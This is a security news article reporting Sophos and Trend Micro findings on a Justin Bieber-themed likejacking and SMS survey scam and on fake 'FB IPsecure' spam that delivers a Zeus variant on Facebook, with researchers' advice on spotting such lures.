Facebook Hit With Likejacking, Zeus Malware Attack


In the latest scam, detected by researchers at Sophos, users receive a message, allegedly coming from one of their friends that states "I can't believe a GIRL did this because of Justin Bieber" coupled with a link to a YouTube knock-off site called "FouTube."

However, the Facebook "Like" option leads to a likejacking scam, resembling many of the attacks that circulated on Facebook earlier this year, according to Chester Wisniewski, a Sophos senior security advisor. Instead of spreading malware, the attack displays a survey and tricks users to subscribing to an exorbitant SMS services rate on their mobile phones. The attack also displays an offer to purchase Facebook Groups/Fan pages, supposedly to help propagate the scam.

Experts say that this attack differs from others in that it exploits users who "Like" the video.

"Most Facebook attacks I have looked at recently were rogue Facebook applications rather than simply liking a Web page," Sophos' Wisniewski said in a blog post Tuesday. "This one is quite poorly crafted, yet it is still spreading quite quickly amongst Facebook users who can't seem to get enough Justin Bieber."

Sponsored post

Those users who have accidentally "Liked" the Justin Bieber Web page should visit their Facebook Wall and remove the "Like," Wisneiwski recommended.

Meanwhile Merianne Polintan, Trend Micro anti-spam research engineer, warned that another malware attack is circulating on the site, entailing spammed message appearing to come from Facebook. The fake messages, written in grammatically incorrect English, falsely warn users that their IP addresses were sending numerous spam messages to different e-mail addresses.

The message then suggests that users download an offered freeware tool, called FB IPsecure, which claims to be from Facebook so that they can put a stop to the spammed messages coming from their machine.

However, in reality, the download is actually a malicious Zeus variant, aimed at taking control of a user's computer once installed.

The attack isn't much different from Zeus-related malware attacks previously circulating on Facebook, experts say.

Even still, Trend Micro researchers warn that users should be cautious when opening unfamiliar or suspicious looking links on Facebook.

"In particular, messages that supposedly come from reputable sites like Facebook but contain plenty of grammatical and spelling mistakes should be treated as very suspicious," Polintan warns.